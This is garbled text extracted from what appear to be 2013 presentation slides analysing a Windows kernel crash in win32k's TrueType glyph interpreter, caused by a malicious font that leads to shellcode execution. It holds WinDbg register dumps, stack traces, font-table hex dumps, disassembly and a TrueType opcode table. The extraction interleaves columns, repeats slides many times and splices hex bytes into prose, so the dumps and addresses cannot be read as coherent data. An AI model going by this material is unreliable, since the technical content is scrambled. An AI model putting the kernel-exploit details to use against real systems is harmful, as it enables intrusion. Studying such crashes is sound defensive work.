0d 23 78win32k!fsg_ExecuteGlyph+0x1d3
b0 01 43 b0 |x..C..Ca..#x..C.|
b207aa94 bf85e8bc
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..|
0003bb80
1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#|
BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...|
0003bba0
00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f|
Followup: 00
MachineOwner
0003bbb0
--------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..|
0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......|
0003bbd0
00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................|
kd> .tss 0x28
0003bbe0
00 66
00 03 00 01ecx=e2482084
04 09 00 05edx=00000001
00 18 00 9c esi=e2481fe0
00 03 |.f..............|
eax=e2481f84
ebx=e2481afc
edi=013abb94
0003bbf0
00
01
04
09
00
06
00
0c
00
66
00
03
00
01
04
09
|.........f......|
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
0003bc00
00
07
00
62
00
b4
00
43
00
6f
00
70
00
79
00
72 |...b...C.o.p.y.r|
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
0003bc10
00
69
00
67
00
68
00
74
00
20
00
a9
00
20
00
32
|.i.g.h.t.
... .2|
e2482368 e8fbffffff
call
e2482368
...
I’ll explain these later
This is the ‘flags’ field
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
01
00
66
01
04
9c
01
79
01
00
00
04
00
00
04
00
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00
00
00
01
03
66
01
07
69
00-08
00-03
04-09
00-1c
00-03
04-09
00-62
00-67
00
00
00
00
00
00
00
00
66
01
02
80
01
06
b4
68
00
04
00
00
04
00
00
00
03
09
0e
03
09
0c
43
74
00
00
00
00
00
00
00
00
01
01
72
01
05
66
6f
20
04
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
........b...C.o.
p.y.r.i.g.h.t. .
...
00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm|
00000070
7f 06 e9 00 00 from
00 01bf85bff7
0c 00 03
9b 67 6c 79 66 |............glyf|
LAST_CONTROL_TRANSFER:
to b8
e2482368
00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head|
...
STACK_TEXT:
0003bad0
00 00 IP
00 not
00 00
00 00
00 00 Following
00 00 00 00
00 |................|
WARNING: Frame
in 00
any00known
module.
frames
may be wrong.
0003bae0
00
5e
00
00
00
01
00
00
00
00
00
01
00
01
00
01
|.^..............|
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
0003baf0
00 a9 b0 013abaf2
00 b0 00 013abb9b
42 4e b0e2481f84
00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c
4d b0 00 43 |......BN..CEM..C|
b207a9c8 bf85f92f
0003bb00
45 61 b0 e248155c
17 23 78 00000001
b0 00 4300000000
b0 01 60win32k!fsg_SimpleInnerGridFit+0x103
20 b0 00 23 |Ea..#x..C..` ..#|
b207a9fc bf862709
0003bb40
78 b0 01 e2481248
43 b0 02 e2481774
43 61 b0e2481f84
0d 23 78win32k!fsg_ExecuteGlyph+0x1d3
b0 01 43 b0 |x..C..Ca..#x..C.|
b207aa94 bf85e8bc
(The author is dyslexic?)
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..|
0003bb80
1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#|
BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...|
0003bba0
00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f|
Followup: 00
MachineOwner
0003bbb0
--------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..|
0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......|
0003bbd0
00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................|
kd> .tss 0x28
0003bbe0
00 66
00 03'glyf'
00 01ecx=e2482084
04
09 00
00 18Data
00 9c[...]
00 03 |.f..............|
Table
- 05
Glyph
eax=e2481f84
ebx=e2481afc
edx=00000001
esi=e2481fe0
edi=013abb94
0003bbf0
00
01
04
09
00
06
00
0c
00
66
00
03
00
01
04
09
|.........f......|
eip=e2482368 esp=b2077000 ebp=b207a9a0
iopl=0
nv up ei nglen
nz ac
pe nc
Glyph
5:00 off
= 79
0x00000000,
= 188
0003bc00
00
07
00
62
00
b4
00
43
00
6f
70
00
00
72
|...b...C.o.p.y.r|
cs=0008 ss=0010 ds=0023
es=0023 fs=0030
gs=0000
efl=00010296
[...]
Length
of
Instructions:
169
0003bc10
00
69
00
67
00
68
00
74
00
20
00
a9
00
20
00
32
|.i.g.h.t.
...
.2|
e2482368 e8fbffffff
call
e2482368
[...]
...
What could 0x3137
possibly mean?
The flags don’t actually
make any sense.
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
00167: RS
WCVTP
01 01 00 00 0000168:
00-08 00
66 00 03 00 01 04
00
66
01
04
9c
01
79
00
00
04
00
00
04
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00 00-03
01Flags
04-09
03 00-1c
----66 00-03
0:
01 04-09
1:
07 00-62
69 00-67
00 01 04 09 00
00 02 00 0e 00
00 80 00 03 00
00 01 04 09 00
YDual
XDual
00 06 00
0c 00
YDual
XDual
00 b4 00
43 00
00 68 00 74 00
01
72
01
05
66
6f
20
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
Y-Short X-Short
........b...C.o.
p.y.r.i.g.h.t. .
On
On
...
00000060 00 00 00 00 00 03 ba d0 00 00 00 02 66 70 67 6d |............fpgm|
00000070
7f 06 e9 00 00 from
00 01bf85bff7
0c 00 03
9b 67 6c 79 66 |............glyf|
LAST_CONTROL_TRANSFER:
to b8
e2482368
00000080 18 d3 69 4b 00 03 ba e4 00 00 00 bc 68 65 61 64 |..iK........head|
...
STACK_TEXT:
0003bad0
00 00 IP
00 not
00 00
00 00
00 00 Following
00 00 00 00
00 |................|
WARNING: Frame
in 00
any00known
module.
frames
may be wrong.
0003bae0
00
5e
00
00
00
01
00
00
00
00
00
01
00
01
00
01
|.^..............|
b207a9a0 bf85bff7 013abaf2 013abb9b e2481f84 0xe2482368
0003baf0
00 a9 b0 013abaf2
00 b0 00 013abb9b
42 4e b0e2481f84
00 43 45win32k!itrp_ExecuteGlyphPgm+0x4c
4d b0 00 43 |......BN..CEM..C|
b207a9c8 bf85f92f
0003bb00
45 61 b0 e248155c
17 23 78 00000001
b0 00 4300000000
b0 01 60win32k!fsg_SimpleInnerGridFit+0x103
20 b0 00 23 |Ea..#x..C..` ..#|
b207a9fc bf862709
0003bb40
78 b0 01 e2481248
43 b0 02 e2481774
43 61 b0e2481f84
0d 23 78win32k!fsg_ExecuteGlyph+0x1d3
b0 01 43 b0 |x..C..Ca..#x..C.|
b207aa94 bf85e8bc
(The author is dyslexic?)
0003bb70 42 b0 02 b0 03 43 42 b0 03 b0 00 43 45 42 b8 ff |B....CB....CEB..|
0003bb80
1c b0 00 43 b0 03 60 45 b0 50 60 b0 00 43 23 |....C..`E.P`..C#|
BUCKET_ID:b5 0x7f_8_win32k!itrp_ExecuteGlyphPgm+4c
0003bb90 44 b0 01 1f b0 00 43 b0 03 43 44 31 37 01 01 00 |D.....C..CD17...|
0003bba0
00 00 08 00 66 00 03 00 01 04 09 00 00 00 66 |.....f.........f|
Followup: 00
MachineOwner
0003bbb0
--------- 00 00 00 03 00 01 04 09 00 01 00 0c 00 66 00 03 |.............f..|
0003bbc0 00 01 04 09 00 02 00 0e 00 72 00 03 00 01 04 09 |.........r......|
0003bbd0
00 03 00 1c 00 80 00 03 00 01 04 09 00 04 00 0c |................|
kd> .tss 0x28
0003bbe0
00 66
00 03'glyf'
00 01ecx=e2482084
04
09 00
00 18Data
00 9c[...]
00 03 |.f..............|
Table
- 05
Glyph
eax=e2481f84
ebx=e2481afc
edx=00000001
esi=e2481fe0
edi=013abb94
0003bbf0
00
01
04
09
00
06
00
0c
00
66
00
03
00
01
04
09
|.........f......|
eip=e2482368 esp=b2077000 ebp=b207a9a0
iopl=0
nv up ei nglen
nz ac
pe nc
Glyph
5:00 off
= 79
0x00000000,
= 188
0003bc00
00
07
00
62
00
b4
00
43
00
6f
70
00
00
72
|...b...C.o.p.y.r|
cs=0008 ss=0010 ds=0023
es=0023 fs=0030
gs=0000
efl=00010296
[...]
Length
of
Instructions:
169
0003bc10
00
69
00
67
00
68
00
74
00
20
00
a9
00
20
00
32
|.i.g.h.t.
...
.2|
e2482368 e8fbffffff
call
e2482368
[...]
...
What could 0x3137
possibly mean?
The flags don’t actually
make any sense.
kd> D 013abb9b
013abb9b 31 37
013abbab 09 00
013abbbb 0c 00
013abbcb 03 00
013abbdb 09 00
013abbeb 18 00
013abbfb 03 00
013abc0b 70 00
Friday, March 8, 2013
00167: RS
WCVTP
01 01 00 00 0000168:
00-08 00
66 00 03 00 01 04
00
66
01
04
9c
01
79
00
00
04
00
00
04
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00 00-03
01Flags
04-09
03 00-1c
----66 00-03
0:
01 04-09
1:
07 00-62
69 00-67
00 01 04 09 00
00 02 00 0e 00
00 80 00 03 00
00 01 04 09 00
YDual
XDual
00 06 00
0c 00
YDual
XDual
00 b4 00
43 00
00 68 00 74 00
01
72
01
05
66
6f
20
00
00
04
00
00
00
00
17........f.....
....f...........
..f...........r.
................
......f.........
..............f.
Y-Short X-Short
........b...C.o.
p.y.r.i.g.h.t. .
On
On
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
kd> U win32k!itrp_ExecuteGlyphPgm win32k!itrp_ExecuteGlyphPgm+60
win32k!itrp_ExecuteGlyphPgm:
bf85bfab 8bff
mov
edi,edi
bf85bfad 55
push
ebp
bf85bfae 8bec
mov
ebp,esp
bf85bfb0 51
push
ecx
bf85bfb1 53
push
ebx
bf85bfb2 8b5d10
mov
ebx,dword ptr [ebp+10h]
bf85bfb5 56
push
esi
bf85bfb6 894dfc
mov
dword ptr [ebp-4],ecx
bf85bfb9 57
push
edi
bf85bfba 8d7324
lea
esi,[ebx+24h]
This is the saved EIP
bf85bfed
bf85bff0
bf85bff2
bf85bff7
bf85bff9
bf85bffc
bf85bfff
Friday, March 8, 2013
8b4dfc
8bd0
e808330000
8bd0
8b4b68
8b7330
33c0
mov
mov
call
mov
mov
mov
xor
ecx,dword ptr [ebp-4]
edx,eax
win32k!itrp_Execute (bf85f2ff)
edx,eax ; fault
ecx,dword ptr [ebx+68h]
esi,dword ptr [ebx+30h]
eax,eax
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
kd> U win32k!itrp_ExecuteGlyphPgm win32k!itrp_ExecuteGlyphPgm+60
win32k!itrp_ExecuteGlyphPgm:
bf85bfab 8bff
mov
edi,edi
bf85bfad 55
push
ebp
bf85bfae 8bec
mov
ebp,esp
bf85bfb0 51
push
ecx
bf85bfb1 53
push
ebx
bf85bfb2 8b5d10
mov
ebx,dword ptr [ebp+10h]
bf85bfb5 56
push
esi
bf85bfb6 894dfc
mov
dword ptr [ebp-4],ecx
bf85bfb9 57
push
edi
bf85bfba 8d7324
lea
esi,[ebx+24h]
So this CALL leads
to shellcode exec.
bf85bfed
bf85bff0
bf85bff2
bf85bff7
bf85bff9
bf85bffc
bf85bfff
Friday, March 8, 2013
8b4dfc
8bd0
e808330000
8bd0
8b4b68
8b7330
33c0
mov
mov
call
mov
mov
mov
xor
ecx,dword ptr [ebp-4]
edx,eax
win32k!itrp_Execute (bf85f2ff)
edx,eax ; fault
ecx,dword ptr [ebx+68h]
esi,dword ptr [ebx+30h]
eax,eax
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
b207aaf0 bf85e779
b207ab30 bf85ed09
b207aba8 bf85c15d
b207abb4 bf85c18f
kd> D e2481f84
e2481f84 fc 1a
e2481f94 00 00
e2481fa4 00 00
e2481fb4 00 00
e2481fc4 03 00
e2481fd4 09 00
e2481fe4 00 00
e2481ff4 40 00
48
04
00
00
00
03
00
00
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
e2481248 e2481f84 e2481764 win32k!fsg_CreateGlyphData+0xd5
e2481248 e2481f84 e24812bc win32k!fsg_GridFit+0x4d
00000001 b207abc4 bf85c18f win32k!fs__Contour+0x291
e2481010 e2481074 b207abdc win32k!fs_ContourGridFit+0x12
And this argument?
e2
00
00
00
00
00
00
00
00
00
44
00
00
80
00
69
1f
00
00
00
00
00
00
c2
48
00
00
00
00
00
00
85
e2-80
00-00
00-00
00-40
00-00
00-01
00-00
bf-03
1f
00
00
00
00
00
00
00
48
00
00
00
00
00
00
00
e2
00
00
00
00
00
00
00
04
00
00
69
00
44
00
00
00
00
00
c2
00
00
00
00
03
00
00
85
00
00
00
00
00
00
00
bf
00
00
00
00
..H...H...H.....
................
....D...........
[email protected]...
................
............D...
................
@...i...........
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
Friday, March 8, 2013
LAST_CONTROL_TRANSFER:
STACK_TEXT:
WARNING: Frame IP
b207a9a0 bf85bff7
b207a9c8 bf85f92f
b207a9fc bf862709
b207aa94 bf85e8bc
b207aaf0 bf85e779
b207ab30 bf85ed09
b207aba8 bf85c15d
b207abb4 bf85c18f
kd> D e2481f84
e2481f84 fc 1a
e2481f94 00 00
e2481fa4 00 00
e2481fb4 00 00
e2481fc4 03 00
e2481fd4 09 00
e2481fe4 00 00
e2481ff4 40 00
48
04
00
00
00
03
00
00
from bf85bff7 to e2482368
not in any known module. Following frames may be wrong.
013abaf2 013abb9b e2481f84 0xe2482368
013abaf2 013abb9b e2481f84 win32k!itrp_ExecuteGlyphPgm+0x4c
e248155c 00000001 00000000 win32k!fsg_SimpleInnerGridFit+0x103
e2481248 e2481774 e2481f84 win32k!fsg_ExecuteGlyph+0x1d3
e2481248 e2481f84 e2481764 win32k!fsg_CreateGlyphData+0xd5
e2481248 e2481f84 e24812bc win32k!fsg_GridFit+0x4d
00000001 b207abc4 bf85c18f win32k!fs__Contour+0x291
e2481010 e2481074 b207abdc win32k!fs_ContourGridFit+0x12
e2
00
00
00
00
00
00
00
00
00
44
00
00
80
00
69
1f
00
00
00
00
00
00
c2
48
00
00
00
00
00
00
85
e2-80
00-00
00-00
00-40
00-00
00-01
00-00
bf-03
1f
00
00
00
00
00
00
00
48
00
00
00
00
00
00
00
e2
00
00
00
00
00
00
00
04
00
00
69
00
44
00
00
00
00
00
c2
00
00
00
00
03
00
00
85
00
00
00
00
00
00
00
bf
00
00
00
00
..H...H...H.....
................
....D...........
[email protected]...
................
............D...
................
@...i...........
Obviously more pointers...
e2481afc
e2481f00
e2481f80
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
Friday, March 8, 2013
Oh, and EDI is pointing just
at the end of the TT program
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> Db 013abb94
013abb94 b0 00
013abba4 00 66
013abbb4 00 01
013abbc4 00 02
013abbd4 00 80
013abbe4 00 01
013abbf4 00 06
013abc04 00 b4
Friday, March 8, 2013
43
00
04
00
00
04
00
00
b0
03
09
0e
03
09
0c
43
03
00
00
00
00
00
00
00
43
01
01
72
01
05
66
6f
44
04
00
00
04
00
00
00
31-37
09-00
0c-00
03-00
09-00
18-00
03-00
70-00
00161:
00162:
00164:
00165:
00167:
00168:
01
00
66
01
04
9c
01
79
01
00
00
04
00
00
04
00
00
66
03
09
0c
03
09
72
00
00
00
00
00
00
00
00
00
00
01
03
66
01
07
69
SSW
PUSHB[1] 0
RS
PUSHB[1] 3
RS
WCVTP
00
00
04
00
00
04
00
00
08
03
09
1c
03
09
62
67
..C..CD17.......
.f.........f....
.........f......
.....r..........
.............f..
................
.....f.........b
...C.o.p.y.r.i.g
Oh yeah, and that stack
overflow I mentioned earlier
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> d b2077000
b2077000 e248236d
b2077010 e248236d
b2077020 e248236d
b2077030 e248236d
b2077040 e248236d
b2077050 e248236d
b2077060 e248236d
b2077070 e248236d
Friday, March 8, 2013
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
e248236d
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> d e2481fe0
e2481fe0 00000044
e2481ff0 00000000
e2482000 00000000
e2482010 00010080
e2482020 00000000
e2482030 e2482368
e2482040 0003b89b
e2482050 00000000
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
00000000
00000040
00000000
00000001
00000000
e24bdbb3
00000000
00000000
00000000
bf85c269
00000000
e2481f80
bf85bd4b
0000000d
00000000
00000000
call
add
add
add
00000000
00000003
00030009
e2481f80
bf85bd4b
e2482318
00000000
00000000
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
And another thing...
shellcode
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> d e2481fe0
e2481fe0 00000044
e2481ff0 00000000
e2482000 00000000
e2482010 00010080
e2482020 00000000
e2482030 e2482368
e2482040 0003b89b
e2482050 00000000
00000000
00000040
00000000
00000001
00000000
e24bdbb3
00000000
00000000
00000000
bf85c269
00000000
e2481f80
bf85bd4b
0000000d
00000000
00000000
00000000
00000003
00030009
e2481f80
bf85bd4b
e2482318
00000000
00000000
Distance: 80 (0x50) bytes,
might be a clue
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
call
add
add
add
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
call
add
add
add
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
And another thing...
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
shellcode
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> dd /c8 e2481f84
e2481f84 e2481afc e2481f00
e2481fa4 00000000 00000044
e2481fc4 00000003 00000000
e2481fe4 00000000 00000000
e2482004 00000000 00000000
e2482024 00000000 bf85bd4b
e2482044 00000000 00000000
Distance: 172 (0xAC) bytes,
might be a clue
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
e2481f80
00000000
00000000
00000000
00030009
bf85bd4b
00000000
call
add
add
add
00030004
00000000
00000000
00000000
00010080
e2482368
00000000
00040000
00000000
00030009
00000040
00000001
e24bdbb3
00000000
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
00000000
00000000
00000080
bf85c269
e2481f80
0000000d
00000000
00000000
00000040
00000001
00000003
e2481f80
e2482318
00000000
00000
bf85c
00000
00000
00000
0003b
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> d /c8
e2481afc
e2481b1c
e2481b3c
e2481b5c
e2481b7c
e2481b9c
e2481bbc
e2481afc
00000001
00000000
00000000
00000000
00000000
00000000
00000000
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
e2482368
00000000
00000000
00000000
00000000
00000000
00000000
0000002c
00000000
00000000
00000000
00000000
00000000
00000000
call
add
add
add
00030009
00000000
00000000
00000000
00000000
00000000
00000000
Oh, and another thing...
00000000
00000000
00000000
00000000
00000000
00000000
00000000
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
shellcode
00000
00000
00000
00000
00000
00000
00000
TSS: 00000028 -- (.tss 0x28)
eax=e2481f84 ebx=e2481afc ecx=e2482084 edx=00000001 esi=e2481fe0 edi=013abb94
eip=e2482368 esp=b2077000 ebp=b207a9a0 iopl=0
nv up ei ng nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010296
e2482368 e8fbffffff
call
e2482368
kd> d /c8
e2481afc
e2481b1c
e2481b3c
e2481b5c
e2481b7c
e2481b9c
e2481bbc
e2481afc
00000001
00000000
00000000
00000000
00000000
00000000
00000000
0000002c
00000000
00000000
00000000
00000000
00000000
00000000
Distance: 4 bytes,
might be a clue
kd> u e2482368
e2482368 e8fbffffff
e248236d 0000
e248236f 0000
e2482371 0000
Friday, March 8, 2013
e2482368
00000000
00000000
00000000
00000000
00000000
00000000
call
add
add
add
00030009
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
e2482368
byte ptr [eax],al
byte ptr [eax],al
byte ptr [eax],al
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000000
00000
00000
00000
00000
00000
00000
00000
win32k.sys
Friday, March 8, 2013
IDA
• Ok, so for some reason itrp_Execute
(x,x,x,x,x,x) is jumping into
shellcode...
Friday, March 8, 2013
Here’s the function
Friday, March 8, 2013
Hey, what’s all this?
Friday, March 8, 2013
Hey, what’s all this?
I’ve seen this
somewhere before...
Instruction Set Summary
Friday, March 8, 2013
DUP[ ]
EIF[ ]
ELSE
ENDF[ ]
EQ[ ]
EVEN[ ]
FDEF[ ]
FLIPOFF[ ]
FLIPON[ ]
FLIPPT[ ]
FLIPRGOFF[ ]
FLIPRGON[ ]
FLOOR[ ]
GC[a]
GETINFO[ ]
GFV[ ]
GPV[ ]
GT[ ]
GTEQ[ ]
IDEF[ ]
IF[ ]
INSTCTRL
IP[ ]
ISECT[ ]
IUP[a]
JMPR
JROF[ ]
JROT[ ]
LOOPCALL[ ]
http://developer.apple.com/font
0x20
e
0x59
0x1B
0x2D
0x54
e2, e1
0x57
e
0x2C
f
0x4E
0x4D
0x80
p1, p2, ..., ploopvalue
0x82
h, l
0x81
h, l
0x66
n
0x46 - 0x47 p
0x88
selector
0x0D
0x0C
0x52
e2, e1
0x53
e2, e1
0x89
f
0x58
e
0x8E
s, v
0x39
p1, p2, ... , ploopvalue
0x0F
a1, a0, b1, b0, p
0x30 - 0x31 0x1C
offset
0x79
e, offset
0x78
e, offset
0x2A
f, count
e, e
b
b
În°
c
result
px, py
px, py
b
b
-
Search
Advanced Search
Log In | Not a Member?
Support
Return to Index
Instruction Set Summary
The following tables provide a quick summary of the names, opcodes, instruction stream and stack
interaction of the TrueType instruction set.
The first table lists those instructions that take data from the instruction stream and place it onto the
interpreter stack. The second table lists the remaining TrueType instructions which take their
arguments from the stack.
Table 1 Instructions taking data from the instruction stream
Instruction Opcode From Instruction Stream Pushes
NPUSHB[ ]
NPUSHW[ ]
PUSHB[abc]
PUSHW[abc]
0x40
n, b1, b2,...bn
0x41
n, w1, w2,...w
0xB0 - 0xB7 b0, b1,..bn
0xB8 - 0xBF w0,w1,..wn
b1,b2...bn
w1,w2...wn
b0, b1, ...,bn
w0 ,w1, ...wn
Table 2 Instructions taking data from the interpreter stack
Instruction Opcode Pops
AA[ ]
ABS[ ]
ADD[ ]
ALIGNPTS[ ]
ALIGNRP[ ]
AND[ ]
CALL[ ]
CEILING[ ]
CINDEX[ ]
CLEAR[ ]
DEBUG[ ]
DELTAC1[ ],
DELTAC2[ ]
DELTAC3[ ]
DELTAP1[ ]
DELTAP2[ ]
DELTAP3[ ]
DEPTH[ ]
DIV[ ]
Friday, March 8, 2013
0x7F
0x64
0x60
0x27
0x3C
0x5A
0x2B
0x67
0x25
0x22
0x4F
0x73
0x74
0x75
0x5D
0x71
0x72
0x24
0x62
Pushes
p
n
|n|
n2, n1
(n1 + n2)
p2, p1
p1, p2, ... , ploopvalue
e2, e1
b
f
n
Èn
k
ek
all items on the stack
n
